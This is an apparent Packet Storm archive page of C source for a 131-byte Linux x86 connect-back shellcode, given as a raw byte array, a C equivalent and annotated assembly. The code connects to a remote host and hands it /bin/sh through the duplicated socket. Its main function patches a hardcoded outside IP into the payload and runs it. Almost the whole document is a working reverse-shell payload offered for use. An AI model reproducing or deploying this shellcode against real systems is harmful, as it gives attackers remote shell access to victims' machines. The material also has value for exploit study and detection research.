Linux x86 131 byte connect back shellcode.
2f7b6f86b4a4d840961d8bbb4ba116066ddd329e45325fc389c858403fdb8850/* linux x86 shellcode by eSDee of Netric (www.netric.org)
* 131 byte - connect back shellcode (port=0xb0ef)
*/
#include <stdio.h>
char
shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0"
"\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";
int
c_code()
{
char *argv[2];
char *sockaddr = "\x02\x00" // Address family
"\xef\xb0" // port
"\x00\x00\x00\x00" // sin_addr
"\x00\x00\x00\x00"
"\x00\x00\x00\x00";
int sock;
sock = socket(2, 1, 6);
if (connect(sock, sockaddr, 16) < 0) exit();
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
argv[0] = "//bin/sh";
argv[1] = NULL;
execve(argv[0], &argv[0], NULL);
exit();
}
int
asm_code()
{
__asm(" # sock = socket(2, 1, 6);
xorl %eax, %eax
xorl %ebx, %ebx
xorl %ecx, %ecx
pushl %ecx
movb $6, %cl # IPPROTO_TCP
pushl %ecx
movb $1, %cl # SOCK_STREAM
pushl %ecx
movb $2, %cl # AF_INET
pushl %ecx
movl %esp, %ecx
movb $1, %bl # SYS_SOCKET
movb $102, %al # SYS_socketcall
int $0x80
# connect(sock, sockaddr, 16)
movl %eax, %edx
xorl %eax, %eax
xorl %ecx, %ecx
pushl %ecx
pushl %ecx
pushl $0x44434241 # ip address
pushw $0xefb0 # port
movb $0x02, %cl # address family
pushw %cx
movl %esp, %edi
movb $16, %bl # sizeof(sockaddr)
pushl %ebx
pushl %edi
pushl %edx # sock
movl %esp, %ecx
movb $3, %bl # SYS_CONNECT
movb $102, %al # SYS_socketcall
int $0x80
xorl %ecx, %ecx
cmpl %eax, %ecx
je CONNECTED
# exit()
xorl %eax, %eax
movb $1, %al # SYS_exit
int $0x80
CONNECTED:
# dup2(sock, 0);
xorl %eax, %eax
movb $63, %al # SYS_dup2
movl %edx, %ebx # sock
int $0x80
# dup2(sock, 1);
xorl %eax, %eax
movb $63, %al # SYS_dup2
movl %edx, %ebx # sock
movb $1, %cl # stdout
int $0x80
# dup2(sock, 2);
xorl %eax, %eax
movb $63, %al # SYS_dup2
movl %edx, %ebx # sock
movb $2, %cl # stderr
int $0x80
# execve(argv[0], &argv[0], NULL);
xorl %eax, %eax
xorl %edx, %edx
pushl %eax
pushl $0x68732f6e # the string
pushl $0x69622f2f # //bin/sh
movl %esp, %ebx
pushl %eax
pushl %ebx
movl %esp, %ecx
movb $11, %al # SYS_execve
int $0x80
# exit()
xorl %eax, %eax
movb $1, %al # SYS_exit
int $0x80
");
}
int
main()
{
void (*funct)();
shellcode[33] = 81; /* ip of www.netric.org :) */
shellcode[34] = 17;
shellcode[35] = 46;
shellcode[36] = 156;
(long) funct = &shellcode;
funct();
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed